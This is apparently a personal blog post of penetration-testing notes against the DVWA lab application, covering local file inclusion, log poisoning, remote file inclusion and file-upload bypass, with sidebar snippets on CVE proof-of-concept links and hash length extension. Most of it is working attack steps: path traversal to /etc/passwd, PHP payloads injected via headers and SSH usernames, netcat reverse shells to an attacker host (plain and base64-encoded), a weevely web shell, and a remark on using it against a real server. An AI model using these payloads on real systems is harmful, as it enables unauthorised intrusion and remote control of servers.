Skip to main content

File Inclusion

By
File Inclusion

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd  --> to get passwords s

-------------------------------------------------------------------------------------------------------
     WEB TERMINAL ACCESS USING FILE INCLUSION      ==========================                                    using environmental variables
---------------------------------------------------------------------------------------------------------

cat /proc/self/environ --> to see environment variables

Opening Environment variables in the target machine
 --> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ

Now Intercept the request using brup suite -
change the browser name log to a php code in the burp suite in header <?phpinfo()?>

type in command prompt
 --> nc -vv -l -p 8888
type in burp suite header (request)
 --> <?passthru("nc -e /bin/sh attacker_ip 8888"); ?>   // <?passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>



-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ============================================using logs --> var/log/auth.log
  --> var/log/apache2/access.log
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> var/log/auth.log shows the authenticated logs

--> lets try to login using "ssh" into the server and check the logs

ssh random@192.168.149.136
random
--> a log is logged


ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP

need to convert the command into base64 --> nc -e /bin/sh attacker_ip 8888
--> open burpsuite and go to decoder paste: nc -e /bin/sh attacker_ip 8888
--> copy the encoded code and paste in the bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4


ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP


 -->type in command prompt
nc -vv -l -p 8888


--> now open this

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log

--> In Cmd type
 id
 ls
 pwd


===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================

It is a special case of file inclusion vulnerabilities. if a server configured to allow a certain function caleed allow
url, allow_url fopen. we will be able to include to any file from any computer to the target computer. can upload any
php file. we can run payloads, reverse shells and system commands as well.


In dvwa, remote file inclusion is turned off, we need to turn it on

sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "On"
ctrl +x
yes
sudo /etc/init.d/apache2 restart


file should be stored on a real server with an ip which should be remotely accessible


<?php

passthru("nc -e /bin/sh 192.168.149.128 8080");


?>

save it as reverse.txt file in /var/www/html

open it as http://localhost/reverse.txt   --> should be accessible remote if u want to hack a real server

in cmd type
--> nc -vv -l -p 8080

run this now ...

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?

whoami
uname -a
ls
pwd


==========================================================================================================
-------------------------- Remote File Inclusion - MediumSecurity -------------
===========================================================================================================
 nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?





securing from Remote file inclusion:


sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "Off"
    allow_url_include = Off
ctrl +x
yes
sudo /etc/init.d/apache2 restart v






File upload vulnerability:
--------------------------
Generate a web payload and gain remote connection or access:
--> weevely generate 12345 /root/Desktop/shell.php   // 123456 is the password
To run it
--> weevely link_of_shell password
change the extension of the file from php to jpg

modify requests using burpsite while uploading file, change the extension of the file from jpg to php

Labels:

Comments

Post a Comment

Popular posts from this blog

POC Links for CVE's

By
  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main
Post a Comment
Read more

Hash Extension Attacks

By
  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512
Post a Comment
Read more